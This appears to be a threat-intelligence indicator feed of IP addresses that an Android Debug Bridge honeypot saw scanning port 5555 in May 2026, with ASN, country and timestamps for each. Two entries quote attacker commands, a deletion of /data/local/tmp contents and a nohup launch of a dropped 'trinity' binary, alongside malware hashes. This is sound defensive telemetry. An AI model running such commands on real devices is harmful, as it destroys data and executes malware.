IPv4	159.65.143.46	Attacker IP • ADB / seen in ADBHoney; events=17; ports=5555; cc=SG; asn=14061; asn_org=DigitalOcean, LLC; cats=Detection of a Network Scan,Generic Protocol Command Decode; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=17 \| first_seen=2026-05-11T13:14:06.000Z \| last_seen=2026-05-11T13:24:22.662Z \| ports=5555 \| cc=SG \| asn=14061 \| org=DigitalOcean, LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-11
IPv4	193.8.186.29	Attacker IP • ADB / seen in ADBHoney; events=20; ports=5555; cc=SG; asn=201002; asn_org=PebbleHost Ltd; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=20 \| first_seen=2026-05-11T13:20:58.000Z \| last_seen=2026-05-11T13:31:35.653Z \| ports=5555 \| cc=SG \| asn=201002 \| org=PebbleHost Ltd	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-11
IPv4	194.187.178.79	Attacker IP • ADB / seen in ADBHoney; events=6; ports=5555; cc=HK; asn=215778; asn_org=Alpha Strike Labs GmbH; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=6 \| first_seen=2026-05-11T13:12:57.000Z \| last_seen=2026-05-11T13:14:08.550Z \| ports=5555 \| cc=HK \| asn=215778 \| org=Alpha Strike Labs GmbH	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-11
IPv4	194.187.178.84	Attacker IP • ADB / seen in ADBHoney; events=9; ports=5555; cc=HK; asn=215778; asn_org=Alpha Strike Labs GmbH; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=9 \| first_seen=2026-05-11T13:12:59.000Z \| last_seen=2026-05-11T13:23:09.977Z \| ports=5555 \| cc=HK \| asn=215778 \| org=Alpha Strike Labs GmbH	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-11
IPv4	187.191.2.213	Attacker IP • ADB / seen in ADBHoney; events=13; ports=5555; cc=MX; asn=22884; asn_org=TOTAL PLAY TELECOMUNICACIONES SA DE CV; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=13 \| first_seen=2026-05-11T14:21:18.000Z \| last_seen=2026-05-11T14:31:56.579Z \| ports=5555 \| cc=MX \| asn=22884 \| org=TOTAL PLAY TELECOMUNICACIONES SA DE CV	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-11
IPv4	64.62.197.38	Attacker IP • ADB / seen in ADBHoney; events=5; ports=5555; cc=US; asn=6939; asn_org=Hurricane Electric LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=5 \| first_seen=2026-05-11T15:20:47.000Z \| last_seen=2026-05-11T15:21:48.457Z \| ports=5555 \| cc=US \| asn=6939 \| org=Hurricane Electric LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-11
IPv4	172.234.218.245	Attacker IP • ADB / seen in ADBHoney; events=5; ports=5555; cc=US; asn=63949; asn_org=Akamai Connected Cloud; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=5 \| first_seen=2026-05-11T16:00:18.000Z \| last_seen=2026-05-11T16:01:22.309Z \| ports=5555 \| cc=US \| asn=63949 \| org=Akamai Connected Cloud	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-11
IPv4	176.65.149.39	Attacker IP • ADB / seen in ADBHoney; events=4; ports=5555; cc=NL; asn=51396; asn_org=Pfcloud UG (haftungsbeschrankt); adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=8 \| first_seen=2026-05-11T17:03:55.000Z \| last_seen=2026-05-13T17:18:17.194Z \| ports=5555 \| cc=NL \| asn=51396 \| org=Pfcloud UG (haftungsbeschrankt)	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-11
IPv4	20.15.163.174	Attacker IP • ADB / seen in ADBHoney; events=27; ports=5555; cc=US; asn=8075; asn_org=Microsoft Corporation; cats=Detection of a Network Scan; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=27 \| first_seen=2026-05-11T17:40:27.000Z \| last_seen=2026-05-11T17:52:59.701Z \| ports=5555 \| cc=US \| asn=8075 \| org=Microsoft Corporation	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-11
IPv4	165.231.148.160	Attacker IP • ADB / seen in ADBHoney; events=10; ports=5555; cc=SE; asn=57858; asn_org=Angelnet Limited; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=10 \| first_seen=2026-05-11T18:40:26.000Z \| last_seen=2026-05-11T18:50:49.344Z \| ports=5555 \| cc=SE \| asn=57858 \| org=Angelnet Limited	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-11
IPv4	120.79.226.29	Attacker IP • ADB / seen in ADBHoney; events=7; ports=5555; cc=CN; asn=37963; asn_org=Hangzhou Alibaba Advertising Co.,Ltd.; cats=Generic Protocol Command Decode; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=7 \| first_seen=2026-05-11T20:39:16.000Z \| last_seen=2026-05-11T20:40:18.400Z \| ports=5555 \| cc=CN \| asn=37963 \| org=Hangzhou Alibaba Advertising Co.,Ltd.	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-11
IPv4	176.65.149.225	Attacker IP • ADB / seen in ADBHoney; events=24; ports=5555; cc=NL; asn=51396; asn_org=Pfcloud UG (haftungsbeschrankt); adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=24 \| first_seen=2026-05-11T22:05:41.000Z \| last_seen=2026-05-11T22:15:53.510Z \| ports=5555 \| cc=NL \| asn=51396 \| org=Pfcloud UG (haftungsbeschrankt)	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-11
IPv4	45.142.193.212	Attacker IP • ADB / seen in ADBHoney; events=26; ports=5555; cc=RO; asn=214295; asn_org=Skynet Network Ltd; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=26 \| first_seen=2026-05-11T22:09:50.000Z \| last_seen=2026-05-11T22:20:28.130Z \| ports=5555 \| cc=RO \| asn=214295 \| org=Skynet Network Ltd	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-11
IPv4	147.182.141.181	Attacker IP • ADB / seen in ADBHoney; events=5; ports=5555; cc=US; asn=14061; asn_org=DigitalOcean, LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=5 \| first_seen=2026-05-11T23:23:12.000Z \| last_seen=2026-05-11T23:24:13.176Z \| ports=5555 \| cc=US \| asn=14061 \| org=DigitalOcean, LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-12
IPv4	194.213.3.117	Attacker IP • ADB / seen in ADBHoney; events=2; ports=5555; cc=GB; asn=212027; asn_org=PebbleHost Ltd; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=2 \| first_seen=2026-05-11T23:24:47.966Z \| last_seen=2026-05-11T23:25:24.772Z \| ports=5555 \| cc=GB \| asn=212027 \| org=PebbleHost Ltd	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-12
IPv4	205.210.31.231	Attacker IP • ADB / seen in ADBHoney; events=23; ports=5555; cc=US; asn=396982; asn_org=Google LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=23 \| first_seen=2026-05-11T23:39:59.000Z \| last_seen=2026-05-11T23:51:40.393Z \| ports=5555 \| cc=US \| asn=396982 \| org=Google LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-12
IPv4	45.82.76.110	Attacker IP • ADB / seen in ADBHoney; events=6; ports=5555; cc=DE; asn=212512; asn_org=Detai Prosperous Technologies Limited; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=6 \| first_seen=2026-05-11T23:31:57.000Z \| last_seen=2026-05-11T23:33:36.519Z \| ports=5555 \| cc=DE \| asn=212512 \| org=Detai Prosperous Technologies Limited	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-12
IPv4	45.82.78.105	Attacker IP • ADB / seen in ADBHoney; events=43; ports=5555; cc=DE; asn=212512; asn_org=Detai Prosperous Technologies Limited; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=43 \| first_seen=2026-05-11T23:32:30.000Z \| last_seen=2026-05-11T23:42:57.819Z \| ports=5555 \| cc=DE \| asn=212512 \| org=Detai Prosperous Technologies Limited	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-12
IPv4	176.65.139.7	Attacker IP • ADB / seen in ADBHoney; events=22; ports=5555; cc=LU; asn=214472; asn_org=Offshore LC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=22 \| first_seen=2026-05-12T01:25:30.000Z \| last_seen=2026-05-12T01:35:46.305Z \| ports=5555 \| cc=LU \| asn=214472 \| org=Offshore LC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-12
IPv4	64.62.156.167	Attacker IP • ADB / seen in ADBHoney; events=4; ports=5555; cc=US; asn=6939; asn_org=Hurricane Electric LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=4 \| first_seen=2026-05-12T01:43:17.000Z \| last_seen=2026-05-12T01:44:20.846Z \| ports=5555 \| cc=US \| asn=6939 \| org=Hurricane Electric LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-12
IPv4	80.94.95.43	Attacker IP • ADB / seen in ADBHoney; events=8; ports=5555; cc=RO; asn=204428; asn_org=SS-Net; cats=Generic Protocol Command Decode; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=8 \| first_seen=2026-05-12T03:43:47.000Z \| last_seen=2026-05-12T03:46:42.296Z \| ports=5555 \| cc=RO \| asn=204428 \| org=SS-Net	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-12
IPv4	64.62.156.177	Attacker IP • ADB / seen in ADBHoney; events=4; ports=5555; cc=US; asn=6939; asn_org=Hurricane Electric LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=9 \| first_seen=2026-05-12T07:07:30.000Z \| last_seen=2026-05-29T06:28:43.674Z \| ports=5555 \| cc=US \| asn=6939 \| org=Hurricane Electric LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-12
IPv4	103.178.61.60	Attacker IP • ADB / seen in ADBHoney; events=10; ports=5555; cc=IN; asn=135738; asn_org=Adn Broadband; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=34 \| first_seen=2026-05-12T11:00:00.000Z \| last_seen=2026-05-12T11:10:10.815Z \| ports=5555 \| cc=IN \| asn=135738 \| org=Adn Broadband	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-12
IPv4	183.109.105.78	Attacker IP • ADB / seen in ADBHoney; events=44; ports=5555; cc=KR; asn=4766; asn_org=Korea Telecom; adb_cmd_hits=0; cmd="rm -rf /data/local/tmp/*" Observed in ADBHoney telemetry for 2026-05. events=44 \| first_seen=2026-05-12T11:27:27.000Z \| last_seen=2026-05-12T11:42:38.596Z \| ports=5555 \| cc=KR \| asn=4766 \| org=Korea Telecom \| related_hashes=71ecfb7bbc015b2b192c05f726468b6f08fcc804c093c718b950e688cc414af5	scanning_host, nadsec, tpot, adbhoney, android, iot, dropper, malware-distribution	2026-05-12
IPv4	222.117.8.26	Attacker IP • ADB / seen in ADBHoney; events=13; ports=5555; cc=KR; asn=4766; asn_org=Korea Telecom; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=13 \| first_seen=2026-05-12T12:16:41.000Z \| last_seen=2026-05-12T12:26:45.095Z \| ports=5555 \| cc=KR \| asn=4766 \| org=Korea Telecom	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-12
IPv4	71.6.242.15	Attacker IP • ADB / seen in ADBHoney; events=15; ports=5555; cc=US; asn=10439; asn_org=CariNet, Inc.; cats=Generic Protocol Command Decode; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=15 \| first_seen=2026-05-12T13:34:38.000Z \| last_seen=2026-05-12T13:48:44.818Z \| ports=5555 \| cc=US \| asn=10439 \| org=CariNet, Inc.	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-12
IPv4	143.42.0.97	Attacker IP • ADB / seen in ADBHoney; events=5; ports=5555; cc=US; asn=63949; asn_org=Akamai Connected Cloud; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=5 \| first_seen=2026-05-12T15:58:03.000Z \| last_seen=2026-05-12T15:59:12.928Z \| ports=5555 \| cc=US \| asn=63949 \| org=Akamai Connected Cloud	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-12
IPv4	157.230.182.211	Attacker IP • ADB / seen in ADBHoney; events=19; ports=5555; cc=US; asn=14061; asn_org=DigitalOcean, LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=19 \| first_seen=2026-05-12T15:37:03.000Z \| last_seen=2026-05-12T15:47:57.080Z \| ports=5555 \| cc=US \| asn=14061 \| org=DigitalOcean, LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-12
IPv4	173.230.150.73	Attacker IP • ADB / seen in ADBHoney; events=5; ports=5555; cc=US; asn=63949; asn_org=Akamai Connected Cloud; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=5 \| first_seen=2026-05-12T15:58:24.000Z \| last_seen=2026-05-12T15:59:27.831Z \| ports=5555 \| cc=US \| asn=63949 \| org=Akamai Connected Cloud	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-12
IPv4	176.65.139.184	Attacker IP • ADB / seen in ADBHoney; events=15; ports=5555; cc=LU; asn=214472; asn_org=Offshore LC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=31 \| first_seen=2026-05-12T15:04:57.000Z \| last_seen=2026-05-14T23:59:35.351Z \| ports=5555 \| cc=LU \| asn=214472 \| org=Offshore LC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-12
IPv4	163.182.227.116	Attacker IP • ADB / seen in ADBHoney; events=65; ports=5555; cc=CA; asn=11287; asn_org=Mitchell Seaforth Cable T. V. Ltd.; adb_cmd_hits=0; cmd="/data/local/tmp/nohup /data/local/tmp/trinity" Observed in ADBHoney telemetry for 2026-05. events=65 \| first_seen=2026-05-12T17:45:20.000Z \| last_seen=2026-05-12T17:57:50.320Z \| ports=5555 \| cc=CA \| asn=11287 \| org=Mitchell Seaforth Cable T. V. Ltd. \| related_hashes=0d3c687ffc30e185b836b99bd07fa2b0d460a090626f6bbbd40a95b98ea70257,63946c28efa919809c03be75a3937c4be80589a9df79cd1be72037d493b70857,a1b6223a3ecb37b9f7e4a52909a08d9fd8f8f80aee46466127ea0f078c7f5437,d7188b8c575367e10ea8b36ec7cca067ef6ce6d26ffa8c74b3faa0b14ebb8ff0	scanning_host, nadsec, tpot, adbhoney, android, iot, dropper, malware-distribution	2026-05-12
IPv4	45.229.146.128	Attacker IP • ADB / seen in ADBHoney; events=5; ports=5555; cc=BR; asn=267155; asn_org=VOE INTERNET; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=5 \| first_seen=2026-05-12T17:07:38.000Z \| last_seen=2026-05-12T17:08:48.192Z \| ports=5555 \| cc=BR \| asn=267155 \| org=VOE INTERNET	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-12
IPv4	134.209.23.167	Attacker IP • ADB / seen in ADBHoney; events=2; ports=5555; cc=GB; asn=14061; asn_org=DigitalOcean, LLC; cats=Detection of a Network Scan; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=17 \| first_seen=2026-05-12T19:50:37.000Z \| last_seen=2026-05-12T20:00:55.504Z \| ports=5555 \| cc=GB \| asn=14061 \| org=DigitalOcean, LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-12
IPv4	185.93.89.170	Attacker IP • ADB / seen in ADBHoney; events=19; ports=5555; cc=IR; asn=213790; asn_org=Limited Network LTD; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=19 \| first_seen=2026-05-12T21:21:01.000Z \| last_seen=2026-05-12T21:31:33.896Z \| ports=5555 \| cc=IR \| asn=213790 \| org=Limited Network LTD	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-12
IPv4	184.105.247.238	Attacker IP • ADB / seen in ADBHoney; events=4; ports=5555; cc=US; asn=6939; asn_org=Hurricane Electric LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=4 \| first_seen=2026-05-13T01:49:25.000Z \| last_seen=2026-05-13T01:50:31.299Z \| ports=5555 \| cc=US \| asn=6939 \| org=Hurricane Electric LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-13
IPv4	184.105.247.252	Attacker IP • ADB / seen in ADBHoney; events=7; ports=5555; cc=US; asn=6939; asn_org=Hurricane Electric LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=9 \| first_seen=2026-05-13T01:51:15.000Z \| last_seen=2026-05-13T02:01:19.256Z \| ports=5555 \| cc=US \| asn=6939 \| org=Hurricane Electric LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-13
IPv4	91.231.89.4	Attacker IP • ADB / seen in ADBHoney; events=6; ports=5555; cc=FR; asn=213412; asn_org=ONYPHE SAS; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=8 \| first_seen=2026-05-13T01:57:53.000Z \| last_seen=2026-05-13T02:07:55.450Z \| ports=5555 \| cc=FR \| asn=213412 \| org=ONYPHE SAS	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-13
IPv4	91.231.89.7	Attacker IP • ADB / seen in ADBHoney; events=6; ports=5555; cc=FR; asn=213412; asn_org=ONYPHE SAS; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=8 \| first_seen=2026-05-13T01:57:53.000Z \| last_seen=2026-05-13T02:08:12.313Z \| ports=5555 \| cc=FR \| asn=213412 \| org=ONYPHE SAS	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-13
IPv4	171.35.131.180	Attacker IP • ADB / seen in ADBHoney; events=5; ports=5555; cc=CN; asn=4837; asn_org=CHINA UNICOM China169 Backbone; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=5 \| first_seen=2026-05-13T02:13:31.000Z \| last_seen=2026-05-13T02:14:40.488Z \| ports=5555 \| cc=CN \| asn=4837 \| org=CHINA UNICOM China169 Backbone	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-13
IPv4	93.123.109.22	Attacker IP • ADB / seen in ADBHoney; events=5; ports=5555; cc=BG; asn=48090; asn_org=Techoff Srv Limited; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=14 \| first_seen=2026-05-13T04:27:36.000Z \| last_seen=2026-05-14T02:34:52.290Z \| ports=5555 \| cc=BG \| asn=48090 \| org=Techoff Srv Limited	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-13
IPv4	139.59.96.155	Attacker IP • ADB / seen in ADBHoney; events=17; ports=5555; cc=SG; asn=14061; asn_org=DigitalOcean, LLC; cats=Detection of a Network Scan,Generic Protocol Command Decode; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=17 \| first_seen=2026-05-13T06:11:57.000Z \| last_seen=2026-05-13T06:22:12.758Z \| ports=5555 \| cc=SG \| asn=14061 \| org=DigitalOcean, LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-13
IPv4	147.185.132.201	Attacker IP • ADB / seen in ADBHoney; events=18; ports=5555; cc=US; asn=396982; asn_org=Google LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=22 \| first_seen=2026-05-13T06:55:36.000Z \| last_seen=2026-05-13T07:07:19.019Z \| ports=5555 \| cc=US \| asn=396982 \| org=Google LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-13
IPv4	130.12.180.150	Attacker IP • ADB / seen in ADBHoney; events=10; ports=5555; cc=NL; asn=202412; asn_org=Omegatech LTD; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=10 \| first_seen=2026-05-13T08:08:49.000Z \| last_seen=2026-05-13T08:18:57.694Z \| ports=5555 \| cc=NL \| asn=202412 \| org=Omegatech LTD	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-13
IPv4	172.110.223.145	Attacker IP • ADB / seen in ADBHoney; events=5; ports=5555; cc=PH; asn=47154; asn_org=Husam A. H. Hijazi; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=5 \| first_seen=2026-05-13T08:10:14.000Z \| last_seen=2026-05-13T08:11:15.869Z \| ports=5555 \| cc=PH \| asn=47154 \| org=Husam A. H. Hijazi	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-13
IPv4	103.176.16.99	Attacker IP • ADB / seen in ADBHoney; events=12; ports=5555; cc=IN; asn=135687; asn_org=Qwistel Network Service Private Limited; cats=Attempted Administrator Privilege Gain; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=12 \| first_seen=2026-05-13T11:39:46.000Z \| last_seen=2026-05-13T11:50:03.042Z \| ports=5555 \| cc=IN \| asn=135687 \| org=Qwistel Network Service Private Limited	malware_hosting, nadsec, tpot, adbhoney, android, iot	2026-05-13
IPv4	74.82.47.3	Attacker IP • ADB / seen in ADBHoney; events=10; ports=5555; cc=US; asn=6939; asn_org=Hurricane Electric LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=10 \| first_seen=2026-05-13T14:39:23.000Z \| last_seen=2026-05-13T14:49:27.200Z \| ports=5555 \| cc=US \| asn=6939 \| org=Hurricane Electric LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-13
IPv4	74.82.47.31	Attacker IP • ADB / seen in ADBHoney; events=5; ports=5555; cc=US; asn=6939; asn_org=Hurricane Electric LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=5 \| first_seen=2026-05-13T14:37:09.000Z \| last_seen=2026-05-13T14:38:17.394Z \| ports=5555 \| cc=US \| asn=6939 \| org=Hurricane Electric LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-13
IPv4	143.42.1.34	Attacker IP • ADB / seen in ADBHoney; events=5; ports=5555; cc=US; asn=63949; asn_org=Akamai Connected Cloud; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=5 \| first_seen=2026-05-13T15:58:03.000Z \| last_seen=2026-05-13T15:59:06.470Z \| ports=5555 \| cc=US \| asn=63949 \| org=Akamai Connected Cloud	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-13
IPv4	173.255.223.49	Attacker IP • ADB / seen in ADBHoney; events=5; ports=5555; cc=US; asn=63949; asn_org=Akamai Connected Cloud; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=5 \| first_seen=2026-05-13T15:58:36.000Z \| last_seen=2026-05-13T15:59:37.422Z \| ports=5555 \| cc=US \| asn=63949 \| org=Akamai Connected Cloud	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-13
IPv4	2.27.62.235	Attacker IP • ADB / seen in ADBHoney; events=5; ports=5555; cc=US; asn=200051; asn_org=Rizki Abdul Azis; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=10 \| first_seen=2026-05-13T15:26:56.000Z \| last_seen=2026-05-18T01:31:52.280Z \| ports=5555 \| cc=US \| asn=200051 \| org=Rizki Abdul Azis	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-13
IPv4	93.152.208.42	Attacker IP • ADB / seen in ADBHoney; events=20; ports=5555; cc=BG; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=20 \| first_seen=2026-05-13T15:37:15.000Z \| last_seen=2026-05-13T15:47:47.716Z \| ports=5555 \| cc=BG	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-13
IPv4	138.197.144.37	Attacker IP • ADB / seen in ADBHoney; events=6; ports=5555; cc=CA; asn=14061; asn_org=DigitalOcean, LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=6 \| first_seen=2026-05-13T16:32:54.000Z \| last_seen=2026-05-13T16:34:04.668Z \| ports=5555 \| cc=CA \| asn=14061 \| org=DigitalOcean, LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-13
IPv4	160.119.76.52	Attacker IP • ADB / seen in ADBHoney; events=14; ports=5555; cc=SC; asn=49870; asn_org=Alsycon B.V.; cats=Generic Protocol Command Decode; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=14 \| first_seen=2026-05-13T17:41:34.000Z \| last_seen=2026-05-13T17:56:25.393Z \| ports=5555 \| cc=SC \| asn=49870 \| org=Alsycon B.V.	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-13
IPv4	165.22.205.95	Attacker IP • ADB / seen in ADBHoney; events=16; ports=5555; cc=NL; asn=14061; asn_org=DigitalOcean, LLC; cats=Generic Protocol Command Decode; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=16 \| first_seen=2026-05-13T18:27:42.000Z \| last_seen=2026-05-13T18:37:59.585Z \| ports=5555 \| cc=NL \| asn=14061 \| org=DigitalOcean, LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-13
IPv4	194.127.167.80	Attacker IP • ADB / seen in ADBHoney; events=8; ports=5555; cc=EE; asn=43357; asn_org=Owl Limited; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=17 \| first_seen=2026-05-13T19:03:30.000Z \| last_seen=2026-05-14T03:59:03.434Z \| ports=5555 \| cc=EE \| asn=43357 \| org=Owl Limited	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-13
IPv4	45.142.193.161	Attacker IP • ADB / seen in ADBHoney; events=5; ports=5555; cc=RO; asn=214295; asn_org=Skynet Network Ltd; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=5 \| first_seen=2026-05-13T19:18:55.000Z \| last_seen=2026-05-13T19:20:00.772Z \| ports=5555 \| cc=RO \| asn=214295 \| org=Skynet Network Ltd	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-13
IPv4	14.152.90.230	Attacker IP • ADB / seen in ADBHoney; events=4; ports=5555; cc=CN; asn=134763; asn_org=CHINANET Guangdong province network; cats=Generic Protocol Command Decode; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=4 \| first_seen=2026-05-13T20:24:41.000Z \| last_seen=2026-05-13T20:25:43.136Z \| ports=5555 \| cc=CN \| asn=134763 \| org=CHINANET Guangdong province network	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-13
IPv4	65.49.1.162	Attacker IP • ADB / seen in ADBHoney; events=7; ports=5555; cc=US; asn=6939; asn_org=Hurricane Electric LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=17 \| first_seen=2026-05-13T20:08:58.000Z \| last_seen=2026-05-21T06:33:07.224Z \| ports=5555 \| cc=US \| asn=6939 \| org=Hurricane Electric LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-13
IPv4	65.49.1.168	Attacker IP • ADB / seen in ADBHoney; events=4; ports=5555; cc=US; asn=6939; asn_org=Hurricane Electric LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=9 \| first_seen=2026-05-13T20:08:16.000Z \| last_seen=2026-05-21T06:22:23.283Z \| ports=5555 \| cc=US \| asn=6939 \| org=Hurricane Electric LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-13
IPv4	45.224.131.176	Attacker IP • ADB / seen in ADBHoney; events=1; ports=5555; cc=BR; asn=266400; asn_org=Ferenz Networks; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=1 \| first_seen=2026-05-13T22:31:07.737Z \| last_seen=2026-05-13T22:31:07.737Z \| ports=5555 \| cc=BR \| asn=266400 \| org=Ferenz Networks	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-13
IPv4	167.172.136.184	Attacker IP • ADB / seen in ADBHoney; events=4; ports=5555; cc=US; asn=14061; asn_org=DigitalOcean, LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=4 \| first_seen=2026-05-14T00:12:21.000Z \| last_seen=2026-05-14T00:13:28.774Z \| ports=5555 \| cc=US \| asn=14061 \| org=DigitalOcean, LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-14
IPv4	64.62.156.192	Attacker IP • ADB / seen in ADBHoney; events=7; ports=5555; cc=US; asn=6939; asn_org=Hurricane Electric LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=7 \| first_seen=2026-05-14T00:48:58.000Z \| last_seen=2026-05-14T00:59:07.366Z \| ports=5555 \| cc=US \| asn=6939 \| org=Hurricane Electric LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-14
IPv4	64.62.156.198	Attacker IP • ADB / seen in ADBHoney; events=4; ports=5555; cc=US; asn=6939; asn_org=Hurricane Electric LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=4 \| first_seen=2026-05-14T00:48:41.000Z \| last_seen=2026-05-14T00:49:42.017Z \| ports=5555 \| cc=US \| asn=6939 \| org=Hurricane Electric LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-14
IPv4	198.235.24.231	Attacker IP • ADB / seen in ADBHoney; events=25; ports=5555; cc=US; asn=396982; asn_org=Google LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=25 \| first_seen=2026-05-14T01:33:56.000Z \| last_seen=2026-05-14T01:45:31.278Z \| ports=5555 \| cc=US \| asn=396982 \| org=Google LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-14
